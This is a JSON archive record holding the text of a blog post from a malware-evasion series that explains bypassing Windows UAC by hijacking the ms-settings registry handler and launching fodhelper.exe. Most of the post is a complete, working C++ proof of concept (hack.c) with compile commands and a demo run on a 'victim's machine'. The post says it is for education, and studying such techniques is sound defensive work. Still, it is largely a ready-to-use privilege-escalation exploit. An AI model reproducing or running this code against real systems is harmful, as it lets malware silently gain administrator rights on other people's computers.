{
	"id": "9afa9dfd-daba-4c39-bced-66c8dc8dd948",
	"created_at": "2026-04-06T00:11:25.088299Z",
	"updated_at": "2026-04-10T13:11:22.21718Z",
	"deleted_at": null,
	"sha1_hash": "5796dd3569e1493e1eea7472a0fb01b414955194",
	"title": "Malware AV/VM evasion - part 17: bypass UAC via fodhelper.exe. Simple C++ example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1276190,
	"plain_text": "Malware AV/VM evasion - part 17: bypass UAC via fodhelper.exe.\r\nSimple C++ example.\r\nBy cocomelonc\r\nPublished: 2023-06-19 · Archived: 2026-04-02 12:08:58 UTC\r\n4 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post appeared as an intermediate result of one of my research projects in which I am going to bypass the\r\nantivirus by depriving it of the right to scan, so this is the result of my own research on the first step, one of the\r\ninteresting UAC bypass trick: via foodhelper.exe with registry modification.\r\nregistry modificationPermalink\r\nThe process of modifying a registry key has as its end objective the rerouting of an elevated program’s execution\r\nflow to a command that has been managed. The most common misuses of key values involve the manipulation of\r\nwindir and systemroot environment variables, as well as shell open commands for particular file extensions\r\n(depending on the program that is being targeted):\r\nhttps://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html\r\nPage 1 of 11\n\nHKCU\\\\Software\\\\Classes\\\u003ctargeted_extension\u003e\\\\shell\\\\open\\command (Default or DelegateExecute\r\nvalues)\r\nHKCU\\\\Environment\\\\windir\r\nHKCU\\\\Environment\\\\systemroot\r\nfodhelper.exePermalink\r\nfodhelper.exe was introduced in Windows 10 to manage optional features like region-specific keyboard\r\nsettings. It’s location is: C:\\Windows\\System32\\fodhelper.exe and it is signed by Microsoft:\r\nWhen fodhelper.exe is started, process monitor begins capturing the process and discloses (among other things)\r\nall registry and filesystem read/write operations. The read registry accesses are one of the most intriguing\r\nactivities, despite the fact that some specific keys or values are not discovered. Because we do not require special\r\npermissions to modify entries, HKEY_CURRENT_USER registry keys are particularly useful for testing how a\r\nprogram’s behavior may change after the creation of a new registry key.\r\nfodhelper.exe , searches for HKCU:\\Software\\Classes\\ms-settings\\shell\\open\\command . This key does not\r\nexist by default in Windows 10:\r\nSo, when malware launches fodhelper (as we know, a Windows binary that permits elevation without requiring\r\na UAC prompt) as a Medium integrity process, Windows automatically elevates fodhelper from a Medium to a\r\nHigh integrity process. The High integrity fodhelper then tries to open a ms-settings file using the file’s\r\ndefault handler. Since the malware with medium integrity has commandeered this handler, the elevated\r\nfodhelper will execute an attack command as a process with high integrity.\r\npractical examplePermalink\r\nhttps://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html\r\nPage 2 of 11\n\nSo, let’s go to create PoC for this logic. First of all create registry key and set values - our registry modification\r\nstep:\r\nHKEY hkey;\r\nDWORD d;\r\nconst char* settings = \"Software\\\\Classes\\\\ms-settings\\\\Shell\\\\Open\\\\command\";\r\nconst char* cmd = \"cmd /c start C:\\\\Windows\\\\System32\\\\cmd.exe\"; // default program\r\nconst char* del = \"\";\r\n// attempt to open the key\r\nLSTATUS stat = RegCreateKeyEx(HKEY_CURRENT_USER, (LPCSTR)settings, 0, NULL, 0, KEY_WRITE, NULL, \u0026hkey, \u0026d);\r\nprintf(stat != ERROR_SUCCESS ? \"failed to open or create reg key\\n\" : \"successfully create reg key\\n\");\r\n// set the registry values\r\nstat = RegSetValueEx(hkey, \"\", 0, REG_SZ, (unsigned char*)cmd, strlen(cmd));\r\nprintf(stat != ERROR_SUCCESS ? \"failed to set reg value\\n\" : \"successfully set reg value\\n\");\r\nstat = RegSetValueEx(hkey, \"DelegateExecute\", 0, REG_SZ, (unsigned char*)del, strlen(del));\r\nprintf(stat != ERROR_SUCCESS ? \"failed to set reg value: DelegateExecute\\n\" : \"successfully set reg value: Deleg\r\n// close the key handle\r\nRegCloseKey(hkey);\r\nAs you can see, just creates a new registry structure in: HKCU:\\Software\\Classes\\ms-settings\\ to perform UAC\r\nbypass.\r\nThen, start elevated app:\r\n // start the fodhelper.exe program\r\nSHELLEXECUTEINFO sei = { sizeof(sei) };\r\nsei.lpVerb = \"runas\";\r\nsei.lpFile = \"C:\\\\Windows\\\\System32\\\\fodhelper.exe\";\r\nsei.hwnd = NULL;\r\nsei.nShow = SW_NORMAL;\r\nif (!ShellExecuteEx(\u0026sei)) {\r\n DWORD err = GetLastError();\r\n printf (err == ERROR_CANCELLED ? \"the user refused to allow privileges elevation.\\n\" : \"unexpected error! erro\r\n} else {\r\n printf(\"successfully create process =^..^=\\n\");\r\n}\r\nreturn 0;\r\nhttps://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html\r\nPage 3 of 11\n\nThat’s all.\r\nFull source code is looks like hack.c :\r\n/*\r\n * hack.c - bypass UAC via fodhelper.exe\r\n * (registry modifications). C++ implementation\r\n * @cocomelonc\r\n * https://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstdio.h\u003e\r\nint main() {\r\n HKEY hkey;\r\n DWORD d;\r\n const char* settings = \"Software\\\\Classes\\\\ms-settings\\\\Shell\\\\Open\\\\command\";\r\n const char* cmd = \"cmd /c start C:\\\\Windows\\\\System32\\\\cmd.exe\"; // default program\r\n const char* del = \"\";\r\n // attempt to open the key\r\n LSTATUS stat = RegCreateKeyEx(HKEY_CURRENT_USER, (LPCSTR)settings, 0, NULL, 0, KEY_WRITE, NULL, \u0026hkey, \u0026d);\r\n printf(stat != ERROR_SUCCESS ? \"failed to open or create reg key\\n\" : \"successfully create reg key\\n\");\r\n // set the registry values\r\n stat = RegSetValueEx(hkey, \"\", 0, REG_SZ, (unsigned char*)cmd, strlen(cmd));\r\n printf(stat != ERROR_SUCCESS ? \"failed to set reg value\\n\" : \"successfully set reg value\\n\");\r\n stat = RegSetValueEx(hkey, \"DelegateExecute\", 0, REG_SZ, (unsigned char*)del, strlen(del));\r\n printf(stat != ERROR_SUCCESS ? \"failed to set reg value: DelegateExecute\\n\" : \"successfully set reg value: Del\r\n // close the key handle\r\n RegCloseKey(hkey);\r\n // start the fodhelper.exe program\r\n SHELLEXECUTEINFO sei = { sizeof(sei) };\r\n sei.lpVerb = \"runas\";\r\n sei.lpFile = \"C:\\\\Windows\\\\System32\\\\fodhelper.exe\";\r\n sei.hwnd = NULL;\r\n sei.nShow = SW_NORMAL;\r\n if (!ShellExecuteEx(\u0026sei)) {\r\n DWORD err = GetLastError();\r\n printf (err == ERROR_CANCELLED ? \"the user refused to allow privileges elevation.\\n\" : \"unexpected error! er\r\n } else {\r\n printf(\"successfully create process =^..^=\\n\");\r\nhttps://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html\r\nPage 4 of 11\n\n}\r\n return 0;\r\n}\r\ndemoPermalink\r\nLet’s go to see everything in action. First, let’s check registry:\r\nreg query \"HKCU\\Software\\Classes\\ms-settings\\Shell\\open\\command\"\r\nAlso, check our current privileges:\r\nCompile our hack.c PoC in attacker’s machine:\r\nx86_64-w64-mingw32-g++ -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sec\r\nThen, just run it in the victim’s machine ( Windows 10 x64 1903 in my case):\r\nhttps://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html\r\nPage 5 of 11\n\nAs you can see, cmd.exe is launched. Check registry structure again:\r\nreg query \"HKCU\\Software\\Classes\\ms-settings\\Shell\\open\\command\"\r\nhttps://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html\r\nPage 6 of 11\n\nAs you can see, the registry has been successfully modified.\r\nCheck privileges in our launched cmd.exe session:\r\nThen, run Process Hacker with Administrator privileges:\r\nhttps://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html\r\nPage 7 of 11\n\nand check properties of our cmd.exe :\r\nhttps://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html\r\nPage 8 of 11\n\nhttps://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html\r\nPage 9 of 11\n\nAs you can see, everything is worked perfectly! =^..^=\r\nGlupteba malware leveraging this method to first elevate from a Medium to High integrity process, then from\r\nHigh to System integrity via Token Manipulation.\r\nI hope this post spreads awareness to the blue teamers of this interesting bypass technique, and adds a weapon to\r\nthe red teamers arsenal.\r\nMITRE ATT\u0026CK: Modify registry\r\nGlupteba\r\nsource code in github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nhttps://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html\r\nPage 10 of 11\n\nSource: https://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html\r\nhttps://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html"
	],
	"report_names": [
		"malware-av-evasion-17.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434285,
	"ts_updated_at": 1775826682,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5796dd3569e1493e1eea7472a0fb01b414955194.pdf",
		"text": "https://archive.orkl.eu/5796dd3569e1493e1eea7472a0fb01b414955194.txt",
		"img": "https://archive.orkl.eu/5796dd3569e1493e1eea7472a0fb01b414955194.jpg"
	}
}